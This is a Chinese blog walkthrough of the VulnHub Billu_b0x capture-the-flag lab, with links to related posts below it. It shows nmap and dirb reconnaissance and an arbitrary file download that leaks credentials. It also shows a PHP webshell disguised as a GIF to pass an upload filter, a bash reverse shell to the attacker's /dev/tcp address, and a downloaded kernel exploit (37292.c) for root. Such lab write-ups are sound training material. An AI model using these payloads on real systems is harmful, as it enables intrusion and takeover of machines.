VulnHub 靶场实战~Billu_b0x

已于 2024-02-26 17:01:47 修改
阅读量1k 收藏 28
点赞数 25
分类专栏: VulnHub 靶场实战 文章标签: 安全
于 2024-02-26 15:58:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75030189/article/details/135705767
版权

billu_b0x靶场难度:适中;感觉很多东西还没掌握,后期继续完善!

一、环境配置

攻击机:kali (192.168.153.138)

官网下载

靶机:Billu_b0x(192.168.153.149)

官方下载

百度网盘下载

提取码:wxhn(百度网盘下载解压后直接导入vmware就可以了)

攻击机和靶机都设置成nat模式

二、渗透过程

1、发现主机(nmap扫描)

nmap -sP 192.168.153.1/24

2、扫描目标主机开放端口

namp -sS 192.168.153.149

发现目标靶机开放了22、80端口

3、扫描端口开放服务

nmap -sV -T4 -O 192.168.153.136 -p 22,80

访问ip看一下(80是默认端口,访问的时候可以不加也可以加)

页面提示:how me your SQLI skills

尝试了一下万能密码SQL注入,但是没有成功,所以继续找其他思路

4、扫描目录(dirb是kali自带的目录扫描工具)

dirb http://192.168.153.136 /usr/share/wordlists/dirb/big.txt


5、看一下总共有几个可以带来有用的信息

http://192.168.153.149/in.php

http://192.168.153.149/phpmy

http://192.168.153.149/add.php

http://192.168.153.149/test.php

http://192.168.153.149/c.php

http://192.168.153.149/index.php

http://192.168.153.149/show.php

http://192.168.153.149/panel.php

http://192.168.153.149/in

http://192.168.153.136/phpmy

发现一个phpmyadmin的登陆页面,尝试弱口令但是进不去,我们没有账号和密码就先继续看其他目录

 http://192.168.153.136/c.php

空白页面,先放着

同样是空白页面,先放着

http://192.168.153.136/test

提示

'file' parameter is empty. Please provide file path in 'file' parameter

“file”参数为空,请在“file”参数中提供文件路径

尝试使用GET传参访问/etc/passw目录

GET传参失败,试一下POST传参

/etc/passwd的信息被下载下来了,可见此处存在任意文件下载

发现该目录存在任意文件下载漏洞,那么就有思路了,我们把前面几个文件都下载下来看一下,(此处用的是brupsuit抓包测试,也可以直接下载下来)

c.php

账号:billu

密码:b0x_billu

发现了个mysql的账号密码,让我们回到刚才的mysql管理平台页面试一下

成功拿到了登录页面的账号密码,回到web登录页面试一下

成功登录

在show users页面发现文件上传路径

add Users是个上传页面

<?php
system($_GET['cmd']);
?>

我们先上传一个一句话木马文件尝试一下

上传失败,并且给我们提示只能上传png、jpg、gif文件

那么我们就上传一个图片马,并且加上GIF89a绕过文件头检测

上传成功

然后用brupsuit抓show user包执行命令看一下

三、执行命令成功之后下一步就是反弹shell

1、kali命令行里输入nc -lvnp 9999开始监听

2、burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.153.138/9999 0>&1” | bash,(注意要将此命令先经过URL编码才能发送,直接在burpsuit里面的Decoder就可以加密了)

3、反弹shell成功(但是只是普通权限)

4、很明显我们拿到的只是普通权限,接下来就是提权

cat /etc/issue(查看当前系统版本)

Ubuntu 12.04

5、重新在kali打开一个终端,使用 Kali 的漏洞查找工具(searchsploit)找到那个最适合该系统版本的

searchsploit Ubuntu 12.04

6、直接把37292.c文件copy到Apache的根目录下

cd /usr/share/exploitdb/exploits/linux/loca

cp 37292.c /var/www/html

7、开启kali的Apache服务

/etc/init.d/apache2 start

8、这里我们要先切换到临时目录,然后wget下载

cd /tmp
wget http://192.168.153.138/37292.c

9、然后编译执行,成功提权

gcc 37292.c -o abc
./abc

10、虽然已经是root权限但是目前还是半交互式,我们改成全交互式

python -c 'import pty;pty.spawn("/bin/bash")'

sea~gull
关注
专栏目录
billu_b0x靶场通关
tpaer的博客
03-03 754
billu_box靶场通关
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 414
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7773
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
billu靶场渗透手把手操作
最新发布
weixin_75034911的博客
07-28 652
对show Users进行抓包分析,可知含有post请求,对load值进行修改,修改为我们上传的图片码的路径,并且图片码中一句话木马为get请求,因为在此页面中已经含有post请求,所以我们在制作图片码时用的get请求。跳出一个下载文件的弹窗,说明是post请求,可以使用burp抓包,看看响应的内容,文件包含并且可以得到文件的内容,也可以包含其他已知的页面,得到页面的源代码。尝试dirb的第二个文件,发现得到了mysql的用户名、密码,在dirb扫描到的文件中有一个phpmy的页面,尝试登录。
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 755
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1340
test。
VulnHub靶场Billu_b0x
M_onster_d的博客
09-10 664
VulnHub靶场Billu_b0x 靶机下载地址 [https://download.vulnhub.com/billu/Billu_b0x.zip] 虚拟机配置 下载的虚拟机是 ova 格式,当然装载到 virtualbox 上最好,也可以装载到vmware workstation上,本人电脑上是workstation,所以装载到workstation上。 打开虚拟机的过程中,可以会出现 “未通过 OVF 规范一致性” 的版本问题,此时需要重新下载 ovftool 工具(忘了从哪下载了…但是网上可
Billu_b0x的渗透测试
Cper的博客
10-26 582
靶场的测试实践和不同思路
VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 1077
该靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
靶场渗透(一)——billu_b0x渗透
Ramona的博客
07-29 1123
测试环境 靶机:billu_b0x 打开虚拟机后设为nat模式 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22...
Billu_b0x
PromisingQ
04-01 3440
完整过程 开启虚拟机用kali扫了半天没扫到,还以为环境有问题…最后发现是网络模式设置的仅主机…改成net以后,nmap -sP 192.168.144.1/24 nmap -p 1-655535 -sV 192.168.144.144 访问80端口 很明显登录框,尝试SQL注入,直接上最高等级,不过还是未果sqlmap -r post.txt --level=5 --risk=3 然后就扫一下目录呗, (字典太大,而且有重复,扫了一个小时,需要优化…) 经过筛选,发现5个可疑的地址: http://
vulnhub-Billu_b0x
qq_43006864的博客
03-27 853
题目:Billu_b0x 攻击机:kali-linux ip地址: 靶机:vulnhub-Billu_b0x 开始解题: 一、信息收集: nmap获取目标主机信息: 这一步主要获取目标主机的端口信息等,先对整段进行扫描。 这里刚开始没注意,靶机默认的事nat模式,我扫了半天一直扫不出来,大家做的时候注意一下。 这里看到103这里开了22和80端口,基本确定是靶机了。再进一步探测端口信息。 nmap -sS -sV -A -p- 192.168.1.103 出
Billu_b0x靶场复现
蘇同学的安全屋的博客
04-29 507
Billu_b0x靶场复现 环境准备: Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址 kali linux 2020虚拟机,ip地址192.168.120.133 kali linux 2020虚拟机,ip地址192.168.120.141 1.信息收集 nmap -sP 192.168.1.0/24 使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141 主机发现
VulnHubbillu_b0x靶场复盘
redwand的博客
01-21 4616
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3941
CTF综合靶场渗透系列-Billu_b0x
vulnhub——BILLU: B0X
weixin_54431413的博客
05-31 403
第一个思路主要是来利用sql注入,文件上传和文件包含漏洞结合来拿到shell,之后利用内核漏洞提权 第二个思路主要是对目标靶机进行了完整的信息收集,拿到更多了信息,利用了文件下载漏洞,拿到了root的密码,直接利用ssh登录目标服务器
VulnHub靶场渗透实战11-Billu_b0x
随心所欲不逾矩
07-31 2341
VulnHub靶场渗透实战11-Billu_b0x
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值